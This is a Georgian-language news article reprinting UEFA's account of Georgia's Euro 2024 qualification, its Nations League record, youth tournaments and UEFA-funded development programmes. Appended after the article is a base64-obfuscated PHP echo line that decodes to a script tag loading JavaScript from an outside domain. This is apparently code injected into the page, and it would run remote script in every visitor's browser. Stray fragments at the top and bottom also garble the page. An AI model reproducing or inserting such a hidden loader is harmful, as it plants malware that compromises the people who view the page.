celsiusi
ავერსი შნაიდერი

ევროპის ჩემპიონატზე საქართველოს ნაკრების გასვლას უეფა-მ საკუთარ ვებგვერდზე ვრცელი წერილი მიუღძვნა. წერილს "ბიზნესთაიმი" უცვლელად გთავაზობთ :

„ევრო 2024-ის საკვალიფიკაციო ეტაპზე საქართველოს ნაკრებმა ისტორია დაწერა და პირველად მოიპოვა დიდ საფეხბურთო ტურნირზე თამაშის უფლება. ეს არის ქართული ფეხბურთის უახლესი ეტაპი, რომელიც განვითარების სტრატეგიითა და უეფა-ს მხარდაჭერით გაძლიერდა.

ევროპის ჩემპიონატზე გასვლა ნაკრებმა ათასობით გულშემატკივართან ერთად იზეიმა და ამ მიღწევის უზარმაზარი მასშტაბი აჩვენა. ნიკა კვეკვესკირის მიერ გატანილი გადამწყვეტი პენალტით საქართველოს ნაკრებმა საბერძნეთი თერთმეტმეტრიანების სერიაში 4:2 დაამარცხა და ზაფხულში ევრო 2024-ზე, F ჯგუფში ჩეხეთთან, პორტუგალიასა და თურქეთთან ერთად ითამაშებს.

ზოგიერთისთვის ევრო 2024-ზე საქართველოს ნაკრების მონაწილეობა, შესაძლოა, მოულოდნელია, თუმცა ქართული ფეხბურთის მცოდნეები აუცილებლად იტყვიან, რომ დიდ საფეხბურთო ტურნირზე საქართველოს ნაკრების მოხვედრა, დიდი ხანია, მოსალოდნელი იყო.

ევრო 2024-ზე მოხვედრა საქართველოს ფეხბურთის ფედერაციის მიერ დაგეგმილი სტრატეგიის შედეგია – ორგანიზაცია ამ მიზნით უეფა-ს მხარდაჭერითაც სარგებლობს.

საქართველო ევრო 2024-ის პლეი ოფში უეფა-ს ერთა ლიგაზე წარმატებით გამოსვლისა და ჯგუფის მოგების წყალობით აღმოჩნდა, მაგრამ ეს ერთადერთი არაა, რაც ამ ტურნირმა ქვეყანას შემატა.

წარმატებული მატჩების სერიითა და ორჯერ ერთა ლიგის ჯგუფში გამარჯვებით, საფუძველი ჩაეყარა ქართული ფეხბურთის მდგრად განვითარებას. აღსანიშნავია, რომ ამ ქვეყანას შეუძლია თავი მოიწონოს ერთა ლიგაზე გამოსვლით, სადაც ყველა მონაწილეს შორის გამარჯვებების ერთ-ერთი ყველაზე მაღალი პროცენტული მაჩვენებელი აქვს.

უფრო მეტიც, 2024/25 წლების სეზონში საქართველოს შესაძლებლობა ექნება, B ლიგაში კიდევ უფრო მაღალი დონის მეტოქეებთან გამოსცადოს თავი. ერთა ლიგის შექმნამდე კლასიკური შესარჩევი ჯგუფიდან ევროპის ჩემპიონატზე მოხვედრა გაცილებით რთული იყო – განსაკუთრებით, ევროპის პატარა საფეხბურთო ქვეყნებისთვის.

საქართველოს ნაკრების ზრდის მაგალითია 2022/23 წლების ერთა ლიგის გათამაშებაში ჩრდილოეთ მაკედონიის ორჯერ დამარცხება, რომელმაც საქართველო ევრო 2020-ის პლეი ოფის ფინალში დაამარცხა და ევროპის ჩემპიონატზე მონაწილეობის შანსი წაართვა.

საქართველოს ეროვნული გუნდის წარმატებას წინ უძღვოდა ასაკობრივი ნაკრებების დონეზე შესამჩნევი მიღწევები. საქართველოს ფეხბურთის ფედერაციამ უეფა-ს ტურნირების მასპინძლობით ასაკობრივი ნაკრებების მოთამაშეებს გამოცდილების მიღების საშუალება მისცა.

2017 წელს საქართველომ 19-წლამდელთა ევროპის ჩემპიონატს უმასპინძლა, სადაც მეოთხედფინალს გულშემატკივართა შთამბეჭდავი რაოდენობა – 25 000 ადამიანი დაესწრო.

2023 წელს საქართველოსა და რუმინეთში 21-წლამდელთა ევროპის ჩემპიონატი ჩატარდა და ფეხბურთისადმი საქართველოს მზარდი ინტერესი ამ ტურნირზეც გამოჩნდა – თამაშებზე, ჯამში, 316,023 ადამიანი მივიდა, ხოლო კონკრეტულად საქართველოს ნაკრების სამ თამაშზე ტურნირის ისტორიაში რეკორდული დასწრება დაფიქსირდა.

საქართველოს ახალგაზრდულმა ნაკრებმა სადებიუტო ევროპის ჩემპიონატზე საკმაოდ რთულ ჯგუფში (ბელგია, ნიდერლანდები, პორტუგალია) პირველი ადგილი დაიკავა და პლეი ოფში გავიდა. ამას დაემატა საქართველოს 17 და 19-წლამდელთა გუნდების ელიტრაუნდში გასვლა და ქართული ფეხბურთის პროგრესი კიდევ უფრო ნათლად გამოჩნდა.

საქართველოში ფეხბურთის პოპულარიზაციის მიზნით მოთამაშეთა რაოდენობის გაზრდა ბოლო ათწლეულის განმავლობაში ფეხბურთის ფედერაციის ერთ-ერთი მთავარი მიზანი იყო. ეს ის სფეროა, სადაც მნიშვნელოვანი წინსვლა აღინიშნა – 2015-2021 წლებში საქართველოში რეგისტრირებული მამაკაცი ფეხბურთელების რაოდენობა 14 676-დან 37 600-მდე გაიზარდა, ხოლო ქალი ფეხბურთელების რაოდენობა თითქმის გაათმაგდა.

ეს განვითარება ნაწილობრივ განპირობებული იყო უეფა-ს პროგრამის (Grow) გრძელვადიანი მხარდაჭერით, რომელიც ეროვნულ ასოციაციებს ფეხბურთის განვითარების სტრატეგიული პროექტების განხორციელებაში ეხმარება.

უეფა-ს მხარდაჭერამ გადამწყვეტი როლი ითამაშა ფედერაციის 2022-2026 წლების სტრატეგიის შემუშავებაში, რომელიც საფუძველს უყრის შემდგომ წარმატებებს. უეფა-მ მნიშვნელოვანი როლი ითამაშა, რომ ევროპის 21-წლამდელთა ჩემპიონატის თანამასპინძლობით ქვეყანას მაქსიმალური ეფექტი მიეღო.

ამას გარდა, უეფა საქართველოს „ჰეთთრიკის“ (HatTrick) პროგრამითაც ეხმარება, რომლის მეშვეობითაც საქართველოს ფეხბურთის ფედერაციამ სოლიდური ინფრასტრუქტურული პროექტები განახორციელა. ეს მოიცავს სტადიონების კაპიტალურ განახლებასა და მთელი ქვეყნის მასშტაბით საფეხბურთო ცენტრების აშენებას, რამაც მეტ ბავშვს და მოთამაშეს მისცა მაღალი ხარისხის საფეხბურთო ობიექტებზე ვარჯიშის საშუალება.

ჰეთთრიკის“ პროგრამის დაფინანსებით საქართველომ 2014 წელს შეძლო ახალი ეროვნული საფეხბურთო აკადემიის დაარსება – ეს ქვეყანა ერთ-ერთი პირველი იყო, რომელიც, უეფა-ს  ხელშეწყობით, ახალგაზრდა მოთამაშეების განვითარების პროგრამაში მონაწილეობდა. საფეხბურთო ინფრასტრუქტურისა და სავარჯიშო პირობების გაუმჯობესებამ სასიცოცხლოდ მნიშვნელოვანი როლი ითამაშა და ამ საფეხბურთო ცენტრში ქვეყნის სხვადასხვა ასაკის ნაკრებებისთვის ბევრი მოთამაშე მოემზადა.

საქართველოში იმედოვნებენ, რომ ევრო 2024-ზე გასვლით ქართული ფეხბურთის განვითარების ახალი ეტაპი დაიწყება“.

707
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");